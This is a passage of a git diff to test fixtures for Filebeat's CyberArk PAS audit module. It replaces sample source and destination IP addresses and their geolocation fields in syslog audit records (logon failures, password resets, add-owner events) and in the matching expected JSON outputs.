08:43:26", "event.action": "authentication_failure", "event.category": [ 
@@ -143,22 +143,19 @@ "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "81.32.170.205" + "67.43.156.14" ], "related.user": [ "PSMAdmin" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" 
@@ -169,25 +166,22 @@ "@timestamp": "2021-03-11T17:46:28.000Z", "cyberarkpas.audit.action": "Undefined User Logon", "cyberarkpas.audit.desc": "Undefined User Logon", - "cyberarkpas.audit.gateway_station": "81.32.170.205", + "cyberarkpas.audit.gateway_station": "67.43.156.14", "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:46:28Z", "cyberarkpas.audit.issuer": "adrian", "cyberarkpas.audit.message": "Undefined User Logon", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 81.32.170.205\n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:46:28\n 2021-03-11T17:46:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n adrian\n Undefined User Logon\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n Undefined User Logon\n 67.43.156.14\n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Error", "cyberarkpas.audit.station": "127.0.0.1", "cyberarkpas.audit.timestamp": "Mar 11 09:46:28", - "destination.address": "81.32.170.205", - "destination.geo.city_name": "Barcelona", - "destination.geo.continent_name": "Europe", - "destination.geo.country_iso_code": "ES", - "destination.geo.country_name": "Spain", - "destination.geo.location.lat": 41.3891, - "destination.geo.location.lon": 2.1611, - "destination.geo.region_iso_code": "ES-B", - "destination.geo.region_name": "Barcelona", - "destination.ip": "81.32.170.205", + "destination.address": "67.43.156.14", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "BT", + "destination.geo.country_name": "Bhutan", + "destination.geo.location.lat": 27.5, + "destination.geo.location.lon": 90.5, + "destination.ip": "67.43.156.14", "event.action": "authentication_failure", "event.category": [ "authentication" 
@@ -205,7 +199,7 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2627,
+ "log.offset": 2625,
 "log.syslog.priority": "7",
 "network.direction": "outbound",
 "observer.hostname": "VAULT",
@@ -214,7 +208,7 @@
 "observer.version": "11.7.0000",
 "related.ip": [
 "127.0.0.1",
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "adrian"
@@ -232,22 +226,25 @@ "@timestamp": "2021-03-14T13:28:00.000Z", "cyberarkpas.audit.action": "Undefined User Logon", "cyberarkpas.audit.desc": "Undefined User Logon", - "cyberarkpas.audit.gateway_station": "34.71.250.247", + "cyberarkpas.audit.gateway_station": "81.2.69.143", "cyberarkpas.audit.iso_timestamp": "2021-03-14T13:28:00Z", "cyberarkpas.audit.issuer": "testark", "cyberarkpas.audit.message": "Undefined User Logon", - "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Undefined User Logon\n 34.71.250.247\n \n\n", + "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 14 06:28:00\n 2021-03-14T13:28:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 309\n Undefined User Logon\n Error\n testark\n Undefined User Logon\n \n \n \n \n 67.43.156.14\n \n \n \n \n \n Undefined User Logon\n 81.2.69.143\n \n\n", "cyberarkpas.audit.rfc5424": true, "cyberarkpas.audit.severity": "Error", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 14 06:28:00", - "destination.address": "34.71.250.247", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "34.71.250.247", + "destination.address": "81.2.69.143", + "destination.geo.city_name": "London", + "destination.geo.continent_name": "Europe", + "destination.geo.country_iso_code": "GB", + "destination.geo.country_name": "United Kingdom", + "destination.geo.location.lat": 51.5142, + "destination.geo.location.lon": -0.0931, + "destination.geo.region_iso_code": "GB-ENG", + "destination.geo.region_name": "England", + "destination.ip": "81.2.69.143", "event.action": "authentication_failure", 
"event.category": [ "authentication" @@ -265,7 +262,7 @@ "fileset.name": "audit", "host.name": "VAULT", "input.type": "log", - "log.offset": 4089, + "log.offset": 4085, "log.syslog.priority": "7", "network.direction": "external", "observer.hostname": "VAULT", @@ -273,23 +270,20 @@ "observer.vendor": "Cyber-Ark", "observer.version": "11.7.0000", "related.ip": [ - "34.71.250.247", - "81.32.170.205" + "67.43.156.14", + "81.2.69.143" ], "related.user": [ "testark" ], "service.type": "cyberarkpas", - "source.address": "81.32.170.205", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "81.32.170.205", + "source.address": "67.43.156.14", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.14", "tags": [ "cyberarkpas.audit", "forwarded" diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log b/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log index 41f67cb2add0..72ee2983bf84 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log 
@@ -1 +1 @@
-<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"316","Desc":"Reset User Password Detailed Information","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password Detailed Information","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"Password changed","ExtraDetails":"","Message":"Reset User Password Detailed Information","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log-expected.json
index d46cdf31a026..ed9a09a00067 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/316_reset_user_password_detailed_information.log-expected.json
@@ -10,7 +10,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMGw_VAGRANT",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 10:16:45",
 "event.action": "reset user password detailed information",
 "event.code": "316",
@@ -29,19 +29,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log b/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log
index f52711e43b99..10d4c10e429c 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log
@@ -1 +1 @@
-<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:45Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:45","IsoTimestamp":"2021-03-10T18:16:45Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"317","Desc":"Reset User Password","Severity":"Info","Issuer":"Administrator","Action":"Reset User Password","SourceUser":"PSMGw_VAGRANT","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Reset User Password","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log-expected.json
index 0d82c44a4ecd..244bebb33c9f 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/317_reset_user_password.log-expected.json
@@ -9,7 +9,7 @@
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMGw_VAGRANT",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 10:16:45",
 "event.action": "reset user password",
 "event.code": "317",
@@ -28,19 +28,16 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log b/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log
index 6aee911c509f..0c69490477b2 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/32_add_owner.log
@@ -1,16 +1,16 @@
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:36","IsoTimestamp":"2021-03-10T09:11:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PVWAGWAccounts","TargetUser":"","Safe":"PSMPADBUserProfile","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:37Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:37","IsoTimestamp":"2021-03-10T09:11:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_localhost.localdomain","TargetUser":"","Safe":"PSMPADBridgeConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T09:11:38Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:38","IsoTimestamp":"2021-03-10T09:11:38Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMP_ADB_AppUsers","TargetUser":"","Safe":"PSMPADBridgeCustom","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
-<5>1 2021-03-10T17:59:32Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:32","IsoTimestamp":"2021-03-10T17:59:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Master","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Batch","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Operators","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Backup Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"DR Users","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"Notification Engines","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:22Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:22","IsoTimestamp":"2021-03-10T09:11:22Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMPApp_localhost.localdomain","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:23Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:23","IsoTimestamp":"2021-03-10T09:11:23Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"32","Desc":"Add Owner","Severity":"Info","Issuer":"Administrator","Action":"Add Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSMPLiveSessions","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Owner","GatewayStation":""}}}
